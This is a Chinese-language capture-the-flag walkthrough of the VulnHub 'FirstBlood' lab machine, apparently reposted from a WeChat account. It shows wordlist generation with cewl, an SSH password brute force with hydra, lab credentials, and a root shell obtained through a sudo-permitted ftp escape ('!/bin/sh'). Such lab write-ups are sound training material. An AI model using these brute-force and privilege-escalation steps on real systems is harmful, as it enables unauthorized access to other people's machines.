FirstBlood_1

admin 2025年4月23日10:12:26评论7 views字数 1765阅读5分53秒阅读模式

下载地址:https://download.vulnhub.com/firstblood/FirstBlood.ova.tar.gz

攻击者IP:192.168.56.132 桥接(自动) vmare

受害者IP:192.168.56.157 仅主机 vxbox

端口扫描,60022为ssh端口

FirstBlood_1

提示查看源代码

FirstBlood_1

hat you're seeing here is an HTML comment. It's not visible on the page but you can see it when you view the source.          While I've got your attention, you should check out: /rambo.html

提示查看rambo.html

FirstBlood_1

提示扫描目录

FirstBlood_1

目录扫描

FirstBlood_1

提升了find的使用方法

找到一个新目录/johnnyrambo/

FirstBlood_1

FirstBlood_1

提示了cewl工具

这个页面可能带有用户名和密码之类的

FirstBlood_1

FirstBlood_1

cewl -w words.txt -d 1 -m 5 http://192.168.56.157/johnnyrambo

FirstBlood_1

cewl:调用 CeWL 工具。

-w words.txt:将抓取到的单词输出到 words.txt 文件中。

-d 1:定义抓取的深度为 1,这意味着工具只会抓取指定 URL 的页面,而不会递归抓取此页面上链接的其他页面。

-m 5:指定单词的最小长度为 5,只有长度大于或等于5的单词会被包括在生成的字典中。

http://192.168.86.132/johnnyrambo:这是目标 URL,表示 CeWL 将在这个网页上抓取符合条件的单词。

爆破johnny

http://192.168.56.157/johnnyrambo/ssh.html

FirstBlood_1

成功获得用户密码

johnny/Vietnam

hydra -l johnny -P words.txt -v 192.168.56.157 ssh -s 60022 -t 4

-l johnny:指定要使用的用户名为 johnny,针对该用户进行破解尝试。

-P words.txt:指定密码列表文件 words.txt,这意味着工具会从该文件中读取密码,尝试对 SSH 服务进行登录。

-v:启用详细模式,显示运行过程中的详细信息和尝试的每一个用户名和密码组合。

-s 60022:指定 SSH 服务监听的端口号为 60022,这用于非标准端口的 SSH 服务。

-t 4:设置并行线程数为 4,表示工具会同时进行 4 个并行连接,试图加快破解速度。

192.168.56.157 ssh:192.168.56.157 是目标主机的 IP 地址,ssh 指定破解用于 SSH 协议。

FirstBlood_1

ssh -p 60022 [email protected]

连接后可以sudo -l

/usr/bin/esudo-properties

FirstBlood_1

找到web的默认目录

干得好!你行驶得很好!当我们发现自己在一个web服务器上时,我们想要检查web目录。以防你还没搞清楚,这个服务器运行的是Nginx。对于这个特殊的设置,我保留了默认设置。如果我们查看配置文件,我们可以查看web目录的位置:cat/etc/nginx/sites-启用/默认输出中的噪声有点大。我们可以用下面的方法来清理它:cat/etc/nginx/sites-enabled/default | grep-v " # "-v是一个反向匹配,基本上会删除所有的注释(#)行。当我们清理它时,以“root”开头的行指向web目录。移动到web目录,看看是否有要读取的文件...

FirstBlood_1

find / -type f -readable 2>/dev/null | grep README.txt

cat /opt/README.txt

找到blood的用户名密码

blood/HackThePlanet2020!!

FirstBlood_1

FirstBlood_1

发现可以查看sly的文件

(sly) /bin/cat /home/sly/README.txt

FirstBlood_1

sudo -u sly /bin/cat /home/sly/README.txt

-u指定用户,默认是root

sly/SylvesterStalone

FirstBlood_1

使用ftp提权

FirstBlood_1

FirstBlood_1

sudo /usr/bin/ftp

!/bin/sh获得root权限

我希望你喜欢这个盒子。我想创造一些更简单的东西,因为我知道这个过程有多令人沮丧和回报。如果你喜欢这个盒子,请在Twitter上联系我,让我知道:

FirstBlood_1

FirstBlood_1

原文始发于微信公众号(王之暴龙战神):FirstBlood_1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月23日10:12:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   FirstBlood_1https://cn-sec.com/archives/3988838.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息